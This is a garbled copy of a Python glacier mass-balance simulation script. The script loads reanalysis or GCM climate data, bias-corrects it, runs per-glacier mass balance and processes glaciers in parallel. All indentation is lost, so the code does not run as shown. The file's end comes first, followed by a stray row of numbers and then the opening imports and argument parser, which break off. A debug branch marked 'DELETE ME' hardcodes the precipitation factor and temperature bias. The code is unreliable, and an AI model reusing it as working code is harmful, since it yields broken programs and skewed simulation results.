# dates_table_nospinup = modelsetup.datesmodelrun(startyear=input.gcm_startyear, endyear=input.gcm_endyear,
# spinupyears=0, option_wateryear=input.gcm_wateryear)
#
# # ===== LOAD CALIBRATION DATA =====
# cal_data = pd.DataFrame()
# for dataset in input.cal_datasets:
# cal_subset = class_mbdata.MBData(name=dataset)
# cal_subset_data = cal_subset.retrieve_mb(main_glac_rgi, main_glac_hyps, dates_table_nospinup)
# cal_data = cal_data.append(cal_subset_data, ignore_index=True)
# cal_data = cal_data.sort_values(['glacno', 't1_idx'])
# cal_data.reset_index(drop=True, inplace=True)
# # =================
# ===== LOAD CLIMATE DATA =====
# Set up climate class
if gcm_name in ['ERA5', 'ERA-Interim', 'COAWST']:
gcm = class_climate.GCM(name=gcm_name)
# Check that end year is reasonable
if (input.gcm_endyear > int(time.strftime("%Y"))) and (input.option_synthetic_sim == 0):
print('\n\nEND YEAR BEYOND AVAILABLE DATA FOR ERA-INTERIM. CHANGE END YEAR.\n\n')
else:
# GCM object
gcm = class_climate.GCM(name=gcm_name, rcp_scenario=rcp_scenario)
# Reference GCM
ref_gcm = class_climate.GCM(name=input.ref_gcm_name)
# Adjust reference dates in event that reference is longer than GCM data
if input.ref_startyear >= input.gcm_startyear:
ref_startyear = input.ref_startyear
else:
ref_startyear = input.gcm_startyear
if input.ref_endyear <= input.gcm_endyear:
ref_endyear = input.ref_endyear
else:
ref_endyear = input.gcm_endyear
dates_table_ref = modelsetup.datesmodelrun(startyear=ref_startyear, endyear=ref_endyear,
spinupyears=input.spinupyears,
option_wateryear=input.ref_wateryear)
# Load climate data
if input.option_synthetic_sim == 0:
# Air temperature [degC]
gcm_temp, gcm_dates = gcm.importGCMvarnearestneighbor_xarray(gcm.temp_fn, gcm.temp_vn, main_glac_rgi,
dates_table)
if input.option_ablation != 2:
gcm_tempstd = np.zeros(gcm_temp.shape)
elif input.option_ablation == 2 and gcm_name in ['ERA5']:
gcm_tempstd, gcm_dates = gcm.importGCMvarnearestneighbor_xarray(gcm.tempstd_fn, gcm.tempstd_vn,
main_glac_rgi, dates_table)
elif input.option_ablation == 2 and input.ref_gcm_name in ['ERA5']:
# Compute temp std based on reference climate data
ref_tempstd, ref_dates = ref_gcm.importGCMvarnearestneighbor_xarray(ref_gcm.tempstd_fn, ref_gcm.tempstd_vn,
main_glac_rgi, dates_table_ref)
# Monthly average from reference climate data
gcm_tempstd = gcmbiasadj.monthly_avg_array_rolled(ref_tempstd, dates_table_ref, dates_table)
else:
gcm_tempstd = np.zeros(gcm_temp.shape)
# Precipitation [m]
gcm_prec, gcm_dates = gcm.importGCMvarnearestneighbor_xarray(gcm.prec_fn, gcm.prec_vn, main_glac_rgi,
dates_table)
# Elevation [m asl]
gcm_elev = gcm.importGCMfxnearestneighbor_xarray(gcm.elev_fn, gcm.elev_vn, main_glac_rgi)
# Lapse rate
if gcm_name in ['ERA-Interim', 'ERA5']:
gcm_lr, gcm_dates = gcm.importGCMvarnearestneighbor_xarray(gcm.lr_fn, gcm.lr_vn, main_glac_rgi, dates_table)
else:
# Compute lapse rates based on reference climate data
ref_lr, ref_dates = ref_gcm.importGCMvarnearestneighbor_xarray(ref_gcm.lr_fn, ref_gcm.lr_vn, main_glac_rgi,
dates_table_ref)
# Monthly average from reference climate data
gcm_lr = gcmbiasadj.monthly_avg_array_rolled(ref_lr, dates_table_ref, dates_table)
# COAWST data has two domains, so need to merge the two domains
if gcm_name == 'COAWST':
gcm_temp_d01, gcm_dates = gcm.importGCMvarnearestneighbor_xarray(gcm.temp_fn_d01, gcm.temp_vn,
main_glac_rgi, dates_table)
gcm_prec_d01, gcm_dates = gcm.importGCMvarnearestneighbor_xarray(gcm.prec_fn_d01, gcm.prec_vn,
main_glac_rgi, dates_table)
gcm_elev_d01 = gcm.importGCMfxnearestneighbor_xarray(gcm.elev_fn_d01, gcm.elev_vn, main_glac_rgi)
# Check if glacier outside of high-res (d02) domain
for glac in range(main_glac_rgi.shape[0]):
glac_lat = main_glac_rgi.loc[glac,input.rgi_lat_colname]
glac_lon = main_glac_rgi.loc[glac,input.rgi_lon_colname]
if (~(input.coawst_d02_lat_min <= glac_lat <= input.coawst_d02_lat_max) or
~(input.coawst_d02_lon_min <= glac_lon <= input.coawst_d02_lon_max)):
gcm_prec[glac,:] = gcm_prec_d01[glac,:]
gcm_temp[glac,:] = gcm_temp_d01[glac,:]
gcm_elev[glac] = gcm_elev_d01[glac]
# ===== Synthetic Simulation =====
elif input.option_synthetic_sim == 1:
# Synthetic dates table
dates_table_synthetic = modelsetup.datesmodelrun(
startyear=input.synthetic_startyear, endyear=input.synthetic_endyear,
option_wateryear=input.gcm_wateryear, spinupyears=0)
# Air temperature [degC]
gcm_temp_tile, gcm_dates = gcm.importGCMvarnearestneighbor_xarray(gcm.temp_fn, gcm.temp_vn, main_glac_rgi,
dates_table_synthetic)
# Precipitation [m]
gcm_prec_tile, gcm_dates = gcm.importGCMvarnearestneighbor_xarray(gcm.prec_fn, gcm.prec_vn, main_glac_rgi,
dates_table_synthetic)
# Elevation [m asl]
gcm_elev = gcm.importGCMfxnearestneighbor_xarray(gcm.elev_fn, gcm.elev_vn, main_glac_rgi)
# Lapse rate
gcm_lr_tile, gcm_dates = gcm.importGCMvarnearestneighbor_xarray(gcm.lr_fn, gcm.lr_vn, main_glac_rgi,
dates_table_synthetic)
# Future simulation based on synthetic (replicated) data; add spinup years; dataset restarts after spinupyears
datelength = dates_table.shape[0] - input.gcm_spinupyears * 12
n_tiles = int(np.ceil(datelength / dates_table_synthetic.shape[0]))
gcm_temp = np.append(gcm_temp_tile[:,:input.gcm_spinupyears*12],
np.tile(gcm_temp_tile,(1,n_tiles))[:,:datelength], axis=1)
gcm_prec = np.append(gcm_prec_tile[:,:input.gcm_spinupyears*12],
np.tile(gcm_prec_tile,(1,n_tiles))[:,:datelength], axis=1)
gcm_lr = np.append(gcm_lr_tile[:,:input.gcm_spinupyears*12], np.tile(gcm_lr_tile,(1,n_tiles))[:,:datelength],
axis=1)
# Temperature and precipitation sensitivity adjustments
gcm_temp = gcm_temp + input.synthetic_temp_adjust
gcm_prec = gcm_prec * input.synthetic_prec_factor
# ===== BIAS CORRECTIONS =====
# No adjustments
if input.option_bias_adjustment == 0 or gcm_name == input.ref_gcm_name:
gcm_temp_adj = gcm_temp
gcm_prec_adj = gcm_prec
gcm_elev_adj = gcm_elev
# Bias correct based on reference climate data
else:
# Air temperature [degC], Precipitation [m], Elevation [masl], Lapse rate [K m-1]
ref_temp, ref_dates = ref_gcm.importGCMvarnearestneighbor_xarray(ref_gcm.temp_fn, ref_gcm.temp_vn,
main_glac_rgi, dates_table_ref)
ref_prec, ref_dates = ref_gcm.importGCMvarnearestneighbor_xarray(ref_gcm.prec_fn, ref_gcm.prec_vn,
main_glac_rgi, dates_table_ref)
ref_elev = ref_gcm.importGCMfxnearestneighbor_xarray(ref_gcm.elev_fn, ref_gcm.elev_vn, main_glac_rgi)
# OPTION 1: Adjust temp using Huss and Hock (2015), prec similar but addresses for variance and outliers
if input.option_bias_adjustment == 1:
# Temperature bias correction
gcm_temp_adj, gcm_elev_adj = gcmbiasadj.temp_biasadj_HH2015(ref_temp, ref_elev, gcm_temp,
dates_table_ref, dates_table)
# Precipitation bias correction
gcm_prec_adj, gcm_elev_adj = gcmbiasadj.prec_biasadj_opt1(ref_prec, ref_elev, gcm_prec,
dates_table_ref, dates_table)
# OPTION 2: Adjust temp and prec using Huss and Hock (2015)
elif input.option_bias_adjustment == 2:
# Temperature bias correction
gcm_temp_adj, gcm_elev_adj = gcmbiasadj.temp_biasadj_HH2015(ref_temp, ref_elev, gcm_temp,
dates_table_ref, dates_table)
# Precipitation bias correction
gcm_prec_adj, gcm_elev_adj = gcmbiasadj.prec_biasadj_HH2015(ref_prec, ref_elev, gcm_prec,
dates_table_ref, dates_table)
# Checks on precipitation data
assert gcm_prec_adj.max() <= 10, 'gcm_prec_adj (precipitation bias adjustment) too high, needs to be modified'
assert gcm_prec_adj.min() >= 0, 'gcm_prec_adj is producing a negative precipitation value'
# ===== RUN MASS BALANCE =====
# Number of simulations
if input.option_calibration == 2:
sim_iters = input.sim_iters
else:
sim_iters = 1
# # Create datasets to store simulations
# output_ds_all, encoding = create_xrdataset(main_glac_rgi, dates_table, sim_iters=sim_iters,
# option_wateryear=input.gcm_wateryear)
# output_ds_all_stats, encoding = create_xrdataset(main_glac_rgi, dates_table, record_stats=1,
# option_wateryear=input.gcm_wateryear)
for glac in range(main_glac_rgi.shape[0]):
if glac == 0 or glac == main_glac_rgi.shape[0]:
print(gcm_name,':', main_glac_rgi.loc[main_glac_rgi.index.values[glac],'RGIId'])
# Select subsets of data
glacier_rgi_table = main_glac_rgi.loc[main_glac_rgi.index.values[glac], :]
glacier_str = '{0:0.5f}'.format(glacier_rgi_table['RGIId_float'])
glacier_gcm_elev = gcm_elev_adj[glac]
glacier_gcm_prec = gcm_prec_adj[glac,:]
glacier_gcm_temp = gcm_temp_adj[glac,:]
glacier_gcm_tempstd = gcm_tempstd[glac,:]
glacier_gcm_lrgcm = gcm_lr[glac,:]
glacier_gcm_lrglac = glacier_gcm_lrgcm.copy()
# ===== Load glacier data: area (km2), ice thickness (m), width (km) =====
if input.hyps_data in ['oggm']:
glac_oggm_df = pd.read_csv(input.oggm_glacierdata_fp + 'RGI60-' + glacier_str + '.csv', index_col=0)
glacier_area_initial = glac_oggm_df['w'].values * glac_oggm_df['dx'].values / 1e6
icethickness_initial = glac_oggm_df['h'].values
width_initial = glac_oggm_df['w'].values / 1e3
elev_bins = glac_oggm_df['z'].values
elif input.hyps_data in ['Huss', 'Farinotti']:
glacier_area_initial = main_glac_hyps.iloc[glac,:].values.astype(float)
icethickness_initial = main_glac_icethickness.iloc[glac,:].values.astype(float)
width_initial = main_glac_width.iloc[glac,:].values.astype(float)
elev_bins = main_glac_hyps.columns.values.astype(int)
# if input.option_surfacetype_debris == 1:
# glacier_debrisfactor = main_glac_debrisfactor.iloc[glac,:].values.astype(float)
# # Empty datasets to record output
# annual_columns = np.unique(dates_table['wateryear'].values)[0:int(dates_table.shape[0]/12)]
# year_values = annual_columns[input.spinupyears:annual_columns.shape[0]]
# year_plus1_values = np.concatenate((annual_columns[input.spinupyears:annual_columns.shape[0]],
# np.array([annual_columns[annual_columns.shape[0]-1]+1])))
# output_temp_glac_monthly = np.zeros((dates_table.shape[0], sim_iters))
# output_prec_glac_monthly = np.zeros((dates_table.shape[0], sim_iters))
# output_acc_glac_monthly = np.zeros((dates_table.shape[0], sim_iters))
# output_refreeze_glac_monthly = np.zeros((dates_table.shape[0], sim_iters))
# output_melt_glac_monthly = np.zeros((dates_table.shape[0], sim_iters))
# output_frontalablation_glac_monthly = np.zeros((dates_table.shape[0], sim_iters))
# output_massbaltotal_glac_monthly = np.zeros((dates_table.shape[0], sim_iters))
# output_runoff_glac_monthly = np.zeros((dates_table.shape[0], sim_iters))
# output_snowline_glac_monthly = np.zeros((dates_table.shape[0], sim_iters))
# output_area_glac_annual = np.zeros((year_plus1_values.shape[0], sim_iters))
# output_volume_glac_annual = np.zeros((year_plus1_values.shape[0], sim_iters))
# output_ELA_glac_annual = np.zeros((year_values.shape[0], sim_iters))
# output_offglac_prec_monthly = np.zeros((dates_table.shape[0], sim_iters))
# output_offglac_refreeze_monthly = np.zeros((dates_table.shape[0], sim_iters))
# output_offglac_melt_monthly = np.zeros((dates_table.shape[0], sim_iters))
# output_offglac_snowpack_monthly = np.zeros((dates_table.shape[0], sim_iters))
# output_offglac_runoff_monthly = np.zeros((dates_table.shape[0], sim_iters))
if icethickness_initial.max() > 0:
if input.hindcast == 1:
glacier_gcm_prec = glacier_gcm_prec[::-1]
glacier_gcm_temp = glacier_gcm_temp[::-1]
glacier_gcm_lrgcm = glacier_gcm_lrgcm[::-1]
glacier_gcm_lrglac = glacier_gcm_lrglac[::-1]
# # get glacier number
# if glacier_rgi_table.O1Region >= 10:
# glacier_RGIId = main_glac_rgi.iloc[glac]['RGIId'][6:]
# else:
# glacier_RGIId = main_glac_rgi.iloc[glac]['RGIId'][7:]
if input.option_import_modelparams == 1:
ds_mp = xr.open_dataset(input.modelparams_fp + glacier_str + '.nc')
cn_subset = input.modelparams_colnames
modelparameters_all = (pd.DataFrame(ds_mp['mp_value'].sel(chain=0).values,
columns=ds_mp.mp.values)[cn_subset])
else:
modelparameters_all = (
pd.DataFrame(np.asarray([input.lrgcm, input.lrglac, input.precfactor, input.precgrad,
input.ddfsnow, input.ddfice, input.tempsnow, input.tempchange])
.reshape(1,-1), columns=input.modelparams_colnames))
# Set the number of iterations and determine every kth iteration to use for the ensemble
if input.option_calibration == 2 and modelparameters_all.shape[0] > 1:
sim_iters = input.sim_iters
# Select every kth iteration
mp_spacing = int((modelparameters_all.shape[0] - input.sim_burn) / sim_iters)
mp_idx_start = np.arange(input.sim_burn, input.sim_burn + mp_spacing)
np.random.shuffle(mp_idx_start)
mp_idx_start = mp_idx_start[0]
mp_idx_all = np.arange(mp_idx_start, modelparameters_all.shape[0], mp_spacing)
else:
sim_iters = 1
# Loop through model parameters
for n_iter in range(sim_iters):
if sim_iters == 1:
modelparameters = modelparameters_all.mean()
else:
mp_idx = mp_idx_all[n_iter]
modelparameters = modelparameters_all.iloc[mp_idx,:]
if debug:
print(glacier_str, ('PF: ' + str(np.round(modelparameters[2],2)) + ' ddfsnow: ' +
str(np.round(modelparameters[4],4)) + ' tbias: ' + str(np.round(modelparameters[7],2))))
print('\n\nDELETE ME! Switch back model parameters\n\n')
modelparameters[2] = 5
modelparameters[7] = -5
print('model params:', modelparameters)
# run mass balance calculation
(glac_bin_temp, glac_bin_prec, glac_bin_acc, glac_bin_refreeze, glac_bin_snowpack, glac_bin_melt,
glac_bin_frontalablation, glac_bin_massbalclim, glac_bin_massbalclim_annual, glac_bin_area_annual,
glac_bin_icethickness_annual, glac_bin_width_annual, glac_bin_surfacetype_annual,
glac_wide_massbaltotal, glac_wide_runoff, glac_wide_snowline, glac_wide_snowpack,
glac_wide_area_annual, glac_wide_volume_annual, glac_wide_ELA_annual, offglac_wide_prec,
offglac_wide_refreeze, offglac_wide_melt, offglac_wide_snowpack, offglac_wide_runoff) = (
massbalance.runmassbalance(modelparameters[0:8], glacier_rgi_table, glacier_area_initial,
icethickness_initial, width_initial, elev_bins, glacier_gcm_temp,
glacier_gcm_tempstd, glacier_gcm_prec, glacier_gcm_elev,
glacier_gcm_lrgcm, glacier_gcm_lrglac, dates_table,
option_areaconstant=0, hindcast=input.hindcast,
debug=input.debug_mb, debug_refreeze=input.debug_refreeze))
if input.hindcast == 1:
glac_bin_temp = glac_bin_temp[:,::-1]
glac_bin_prec = glac_bin_prec[:,::-1]
glac_bin_acc = glac_bin_acc[:,::-1]
glac_bin_refreeze = glac_bin_refreeze[:,::-1]
glac_bin_snowpack = glac_bin_snowpack[:,::-1]
glac_bin_melt = glac_bin_melt[:,::-1]
glac_bin_frontalablation = glac_bin_frontalablation[:,::-1]
glac_bin_massbalclim = glac_bin_massbalclim[:,::-1]
glac_bin_massbalclim_annual = glac_bin_massbalclim_annual[:,::-1]
glac_bin_area_annual = glac_bin_area_annual[:,::-1]
glac_bin_icethickness_annual = glac_bin_icethickness_annual[:,::-1]
glac_bin_width_annual = glac_bin_width_annual[:,::-1]
glac_bin_surfacetype_annual = glac_bin_surfacetype_annual[:,::-1]
glac_wide_massbaltotal = glac_wide_massbaltotal[::-1]
glac_wide_runoff = glac_wide_runoff[::-1]
glac_wide_snowline = glac_wide_snowline[::-1]
glac_wide_snowpack = glac_wide_snowpack[::-1]
glac_wide_area_annual = glac_wide_area_annual[::-1]
glac_wide_volume_annual = glac_wide_volume_annual[::-1]
glac_wide_ELA_annual = glac_wide_ELA_annual[::-1]
offglac_wide_prec = offglac_wide_prec[::-1]
offglac_wide_refreeze = offglac_wide_refreeze[::-1]
offglac_wide_melt = offglac_wide_melt[::-1]
offglac_wide_snowpack = offglac_wide_snowpack[::-1]
offglac_wide_runoff = offglac_wide_runoff[::-1]
# # RECORD PARAMETERS TO DATASET
# if input.output_package == 2:
# (glac_wide_temp, glac_wide_prec, glac_wide_acc, glac_wide_refreeze, glac_wide_melt,
# glac_wide_frontalablation, glac_wide_massbaltotal, glac_wide_runoff, glac_wide_snowline,
# glac_wide_area_annual, glac_wide_volume_annual, glac_wide_ELA_annual) = (
# convert_glacwide_results(elev_bins, glac_bin_temp, glac_bin_prec, glac_bin_acc,
# glac_bin_refreeze, glac_bin_snowpack, glac_bin_melt,
# glac_bin_frontalablation, glac_bin_massbalclim_annual,
# glac_bin_area_annual, glac_bin_icethickness_annual))
#
# if debug:
# # Compute glacier volume change for every time step and use this to compute mass balance
# # this will work for any indexing
# glac_wide_area = glac_wide_area_annual[:-1].repeat(12)
# # Mass change [km3 mwe]
# # mb [mwea] * (1 km / 1000 m) * area [km2]
# glac_wide_masschange = glac_wide_massbaltotal / 1000 * glac_wide_area
# # Mean annual mass balance [mwea]
# # note: used annual shape - 1 because area and volume have "n+1 years" t0 account for initial
# # and final
# mb_mwea = (glac_wide_masschange.sum() / glac_wide_area[0] * 1000 /
# (glac_wide_area_annual.shape[0]-1))
# print(' mb_model [mwea]:', mb_mwea.round(3))
#
# # Record output to xarray dataset
# output_temp_glac_monthly[:, n_iter] = glac_wide_temp
# output_prec_glac_monthly[:, n_iter] = glac_wide_prec
# output_acc_glac_monthly[:, n_iter] = glac_wide_acc
# output_refreeze_glac_monthly[:, n_iter] = glac_wide_refreeze
# output_melt_glac_monthly[:, n_iter] = glac_wide_melt
# output_frontalablation_glac_monthly[:, n_iter] = glac_wide_frontalablation
# output_massbaltotal_glac_monthly[:, n_iter] = glac_wide_massbaltotal
# output_runoff_glac_monthly[:, n_iter] = glac_wide_runoff
# output_snowline_glac_monthly[:, n_iter] = glac_wide_snowline
# output_area_glac_annual[:, n_iter] = glac_wide_area_annual
# output_volume_glac_annual[:, n_iter] = glac_wide_volume_annual
# output_ELA_glac_annual[:, n_iter] = glac_wide_ELA_annual
# output_offglac_prec_monthly[:, n_iter] = offglac_wide_prec
# output_offglac_refreeze_monthly[:, n_iter] = offglac_wide_refreeze
# output_offglac_melt_monthly[:, n_iter] = offglac_wide_melt
# output_offglac_snowpack_monthly[:, n_iter] = offglac_wide_snowpack
# output_offglac_runoff_monthly[:, n_iter] = offglac_wide_runoff
#
# if debug:
# print(' years:', glac_wide_volume_annual.shape[0]-1)
# print(' vol start/end:', np.round(glac_wide_volume_annual[0],2), '/',
# np.round(glac_wide_volume_annual[-1],2))
# print(' area start/end:', np.round(glac_wide_area_annual[0],2), '/',
# np.round(glac_wide_area_annual[-1],2))
# print(' volume:', glac_wide_volume_annual)
# # print('glac runoff max:', np.round(glac_wide_runoff.max(),0),
# # 'glac prec max:', np.round(glac_wide_prec.max(),2),
# # 'glac refr max:', np.round(glac_wide_refreeze.max(),2),
# # 'offglac ref max:', np.round(offglac_wide_refreeze.max(),2))
#
# # ===== Export Results =====
# rgi_table_ds = pd.DataFrame(np.zeros((1,glacier_rgi_table.shape[0])), columns=glacier_rgi_table.index)
# rgi_table_ds.iloc[0,:] = glacier_rgi_table.values
# output_ds_all_stats, encoding = create_xrdataset(rgi_table_ds, dates_table, record_stats=1,
# option_wateryear=input.gcm_wateryear)
# output_ds_all_stats['temp_glac_monthly'].values[0,:,:] = calc_stats_array(output_temp_glac_monthly)
# output_ds_all_stats['prec_glac_monthly'].values[0,:,:] = calc_stats_array(output_prec_glac_monthly)
# output_ds_all_stats['acc_glac_monthly'].values[0,:,:] = calc_stats_array(output_acc_glac_monthly)
# output_ds_all_stats['refreeze_glac_monthly'].values[0,:,:] = calc_stats_array(output_refreeze_glac_monthly)
# output_ds_all_stats['melt_glac_monthly'].values[0,:,:] = calc_stats_array(output_melt_glac_monthly)
# output_ds_all_stats['frontalablation_glac_monthly'].values[0,:,:] = (
# calc_stats_array(output_frontalablation_glac_monthly))
# output_ds_all_stats['massbaltotal_glac_monthly'].values[0,:,:] = (
# calc_stats_array(output_massbaltotal_glac_monthly))
# output_ds_all_stats['runoff_glac_monthly'].values[0,:,:] = calc_stats_array(output_runoff_glac_monthly)
# output_ds_all_stats['snowline_glac_monthly'].values[0,:,:] = calc_stats_array(output_snowline_glac_monthly)
# output_ds_all_stats['area_glac_annual'].values[0,:,:] = calc_stats_array(output_area_glac_annual)
# output_ds_all_stats['volume_glac_annual'].values[0,:,:] = calc_stats_array(output_volume_glac_annual)
# output_ds_all_stats['ELA_glac_annual'].values[0,:,:] = calc_stats_array(output_ELA_glac_annual)
# output_ds_all_stats['offglac_prec_monthly'].values[0,:,:] = calc_stats_array(output_offglac_prec_monthly)
# output_ds_all_stats['offglac_melt_monthly'].values[0,:,:] = calc_stats_array(output_offglac_melt_monthly)
# output_ds_all_stats['offglac_refreeze_monthly'].values[0,:,:] = (
# calc_stats_array(output_offglac_refreeze_monthly))
# output_ds_all_stats['offglac_snowpack_monthly'].values[0,:,:] = (
# calc_stats_array(output_offglac_snowpack_monthly))
# output_ds_all_stats['offglac_runoff_monthly'].values[0,:,:] = (
# calc_stats_array(output_offglac_runoff_monthly))
#
# # Export statistics to netcdf
# if input.output_package == 2:
# output_sim_fp = input.output_sim_fp + gcm_name + '/'
# if gcm_name not in ['ERA-Interim', 'ERA5', 'COAWST']:
# output_sim_fp += rcp_scenario + '/'
# # Create filepath if it does not exist
# if os.path.exists(output_sim_fp) == False:
# os.makedirs(output_sim_fp)
# # Netcdf filename
# if gcm_name in ['ERA-Interim', 'ERA5', 'COAWST']:
# # Filename
# netcdf_fn = (glacier_str + '_' + gcm_name + '_c' + str(input.option_calibration) + '_ba' +
# str(input.option_bias_adjustment) + '_' + str(sim_iters) + 'sets' + '_' +
# str(input.gcm_startyear) + '_' + str(input.gcm_endyear) + '.nc')
# else:
# netcdf_fn = (glacier_str + '_' + gcm_name + '_' + rcp_scenario + '_c' +
# str(input.option_calibration) + '_ba' + str(input.option_bias_adjustment) + '_' +
# str(sim_iters) + 'sets' + '_' + str(input.gcm_startyear) + '_' + str(input.gcm_endyear)
# + '.nc')
# if input.option_synthetic_sim==1:
# netcdf_fn = (netcdf_fn.split('--')[0] + '_T' + str(input.synthetic_temp_adjust) + '_P' +
# str(input.synthetic_prec_factor) + '--' + netcdf_fn.split('--')[1])
# # Export netcdf
# output_ds_all_stats.to_netcdf(output_sim_fp + netcdf_fn, encoding=encoding)
#
# # Close datasets
# output_ds_all_stats.close()
#
#
# if debug_spc:
# os.remove(debug_fp + debug_rgiid_fn)
# Global variables for Spyder development
if args.option_parallels == 0:
global main_vars
main_vars = inspect.currentframe().f_locals
#%% PARALLEL PROCESSING
if __name__ == '__main__':
time_start = time.time()
parser = getparser()
args = parser.parse_args()
if args.debug == 1:
debug = True
else:
debug = False
# RGI glacier number
if args.rgi_glac_number_fn is not None:
with open(args.rgi_glac_number_fn, 'rb') as f:
glac_no = pickle.load(f)
elif input.glac_no is not None:
glac_no = input.glac_no
else:
main_glac_rgi_all = modelsetup.selectglaciersrgitable(
rgi_regionsO1=input.rgi_regionsO1, rgi_regionsO2 =input.rgi_regionsO2,
rgi_glac_number=input.rgi_glac_number)
glac_no = list(main_glac_rgi_all['rgino_str'].values)
# Regions
regions_str = 'R'
for region in sorted(set([x.split('.')[0] for x in glac_no])):
regions_str += str(region)
# Number of cores for parallel processing
if args.option_parallels != 0:
num_cores = int(np.min([len(glac_no), args.num_simultaneous_processes]))
else:
num_cores = 1
# Glacier number lists to pass for parallel processing
glac_no_lsts = split_glaciers.split_list(glac_no, n=num_cores, option_ordered=args.option_ordered)
# Read GCM names from argument parser
gcm_name = args.gcm_list_fn
if args.gcm_name is not None:
gcm_list = [args.gcm_name]
rcp_scenario = args.rcp
elif args.gcm_list_fn == input.ref_gcm_name:
gcm_list = [input.ref_gcm_name]
rcp_scenario = args.rcp
else:
with open(args.gcm_list_fn, 'r') as gcm_fn:
gcm_list = gcm_fn.read().splitlines()
rcp_scenario = os.path.basename(args.gcm_list_fn).split('_')[1]
print('Found %d gcms to process'%(len(gcm_list)))
# Loop through all GCMs
for gcm_name in gcm_list:
if args.rcp is None:
print('Processing:', gcm_name)
else:
print('Processing:', gcm_name, rcp_scenario)
# Pack variables for multiprocessing
list_packed_vars = []
for count, glac_no_lst in enumerate(glac_no_lsts):
list_packed_vars.append([count, glac_no_lst, regions_str, gcm_name])
# Parallel processing
if args.option_parallels != 0:
print('Processing in parallel with ' + str(args.num_simultaneous_processes) + ' cores...')
with multiprocessing.Pool(args.num_simultaneous_processes) as p:
p.map(main,list_packed_vars)
# If not in parallel, then only should be one loop
else:
# Loop through the chunks and export bias adjustments
for n in range(len(list_packed_vars)):
main(list_packed_vars[n])
print('Total processing time:', time.time()-time_start, 's')
#%% ===== PLOTTING AND PROCESSING FOR MODEL DEVELOPMENT =====
# Place local variables in variable explorer
if args.option_parallels == 0:
main_vars_list = list(main_vars.keys())
gcm_name = main_vars['gcm_name']
main_glac_rgi = main_vars['main_glac_rgi']
# main_glac_hyps = main_vars['main_glac_hyps']
# main_glac_icethickness = main_vars['main_glac_icethickness']
# main_glac_width = main_vars['main_glac_width']
dates_table = main_vars['dates_table']
if input.option_synthetic_sim == 1:
dates_table_synthetic = main_vars['dates_table_synthetic']
gcm_temp_tile = main_vars['gcm_temp_tile']
gcm_prec_tile = main_vars['gcm_prec_tile']
gcm_lr_tile = main_vars['gcm_lr_tile']
gcm_temp = main_vars['gcm_temp']
gcm_tempstd = main_vars['gcm_tempstd']
gcm_prec = main_vars['gcm_prec']
gcm_elev = main_vars['gcm_elev']
gcm_lr = main_vars['gcm_lr']
gcm_temp_adj = main_vars['gcm_temp_adj']
gcm_prec_adj = main_vars['gcm_prec_adj']
gcm_elev_adj = main_vars['gcm_elev_adj']
gcm_temp_lrglac = main_vars['gcm_lr']
# output_ds_all_stats = main_vars['output_ds_all_stats']
# modelparameters = main_vars['modelparameters']
glacier_rgi_table = main_vars['glacier_rgi_table']
glacier_str = main_vars['glacier_str']
glac_oggm_df = main_vars['glac_oggm_df']
glacier_gcm_temp = main_vars['glacier_gcm_temp']
glacier_gcm_tempstd = main_vars['glacier_gcm_tempstd']
glacier_gcm_prec = main_vars['glacier_gcm_prec']
glacier_gcm_elev = main_vars['glacier_gcm_elev']
glacier_gcm_lrgcm = main_vars['glacier_gcm_lrgcm']
glacier_gcm_lrglac = glacier_gcm_lrgcm
glacier_area_initial = main_vars['glacier_area_initial']
icethickness_initial = main_vars['icethickness_initial']
width_initial = main_vars['width_initial']
elev_bins = main_vars['elev_bins']
glac_bin_frontalablation = main_vars['glac_bin_frontalablation']
glac_bin_area_annual = main_vars['glac_bin_area_annual']
glac_bin_massbalclim_annual = main_vars['glac_bin_massbalclim_annual']
glac_bin_melt = main_vars['glac_bin_melt']
glac_bin_acc = main_vars['glac_bin_acc']
glac_bin_refreeze = main_vars['glac_bin_refreeze']
glac_bin_snowpack = main_vars['glac_bin_snowpack']
glac_bin_temp = main_vars['glac_bin_temp']
glac_bin_prec = main_vars['glac_bin_prec']
glac_bin_massbalclim = main_vars['glac_bin_massbalclim']
glac_wide_massbaltotal = main_vars['glac_wide_massbaltotal']
glac_wide_area_annual = main_vars['glac_wide_area_annual']
glac_wide_volume_annual = main_vars['glac_wide_volume_annual']
glac_wide_runoff = main_vars['glac_wide_runoff']
# glac_wide_prec = main_vars['glac_wide_prec']
# glac_wide_refreeze = main_vars['glac_wide_refreeze']
modelparameters_all = main_vars['modelparameters_all']
sim_iters = main_vars['sim_iters']
| 57.59207 | 122 | 0.599354 | """Run a model simulation."""
# Default climate data is ERA-Interim; specify CMIP5 by specifying a filename to the argument:
# (Command line) python run_simulation_list_multiprocess.py -gcm_list_fn=C:\...\gcm_rcpXX_filenames.txt
# - Default is running ERA-Interim in parallel with five processors.
# (Spyder) %run run_simulation_list_multiprocess.py C:\...\gcm_rcpXX_filenames.txt -option_parallels=0
# - Spyder cannot run parallels, so always set -option_parallels=0 when testing in Spyder.
# Spyder cannot run parallels, so always set -option_parallels=0 when testing in Spyder.
# Built-in libraries
import argparse
import collections
import inspect
import multiprocessing
import os
import time
# External libraries
import pandas as pd
import pickle
import numpy as np
import xarray as xr
# Local libraries
import class_climate
import class_mbdata
import pygem_input as input
import pygemfxns_gcmbiasadj as gcmbiasadj
import pygemfxns_massbalance as massbalance
import pygemfxns_modelsetup as modelsetup
import spc_split_glaciers as split_glaciers
#%% FUNCTIONS
def getparser():
"""
Use argparse to add arguments from the command line
Parameters
----------
gcm_list_fn (optional) : str
text file that contains the climate data to be used in the model simulation
gcm_name (optional) : str
gcm name
rcp (optional) : str
representative concentration pathway (ex. 'rcp26')
num_simultaneous_processes (optional) : int
number of cores to use in parallels
option_parallels (optional) : int
switch to use parallels or not
rgi_glac_number_fn (optional) : str
filename of .pkl file containing a list of glacier numbers that used to run batches on the supercomputer
batch_number (optional): int
batch number used to differentiate output on supercomputer
option_ordered : int
option to keep glaciers ordered or to grab every n value for the batch
(the latter helps make sure run times on each core are similar as it removes any timing differences caused by
regional variations)
debug (optional) : int
Switch for turning debug printing on or off (default = 0 (off))
debug_spc (optional) : int
Switch for turning debug printing of spc on or off (default = 0 (off))
Returns
-------
Object containing arguments and their respective values.
"""
parser = argparse.ArgumentParser(description="run simulations from gcm list in parallel")
# add arguments
parser.add_argument('-gcm_list_fn', action='store', type=str, default=input.ref_gcm_name,
help='text file full of commands to run')
parser.add_argument('-gcm_name', action='store', type=str, default=None,
help='GCM name used for model run')
parser.add_argument('-rcp', action='store', type=str, default=None,
help='rcp scenario used for model run (ex. rcp26)')
parser.add_argument('-num_simultaneous_processes', action='store', type=int, default=4,
help='number of simultaneous processes (cores) to use')
